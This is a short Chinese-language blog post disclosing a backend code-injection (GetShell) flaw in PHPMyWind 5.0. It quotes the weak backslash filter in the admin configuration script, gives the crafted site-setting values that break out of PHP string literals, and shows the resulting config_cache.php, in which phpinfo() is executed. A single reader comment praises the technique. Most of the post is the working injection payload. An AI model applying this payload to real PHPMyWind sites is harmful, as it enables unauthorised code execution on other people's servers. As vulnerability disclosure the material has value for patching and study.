phpmywind 5.0 后台GetShell漏洞

漏洞作者: 蓝蓝

admin/web_congif.php 的过滤代码如下。

[php]

//强制去掉 '

//强制去掉最后一位 /

$vartmp = str_replace("'",'',$row['varvalue']);

 

if(substr($vartmp, -1) == '\\')

{

$vartmp = substr($vartmp,1,-1);

}

[/php]

只过滤了最后一位的反斜杠,只需要加两个反斜杠就可以了·····

首先修改网站配置信息

121646270a96d14c3768a1c07d7118338fe6b5f7

 

 

config_cache.php中会变成这样

[php]

$cfg_webname = '的网站\';

$cfg_weburl = ';/*http://127.0.0.1';

$cfg_webpath = '*/phpinfo();#';

$cfg_author = '';

[/php]

php代码就会被执行了。

12164859fd518a24f6c9241c7ae3dcb8f1d93d12

1 条评论

  1. xy

    这个getshell 办法不错 = = 大牛棒棒的 = =

发表评论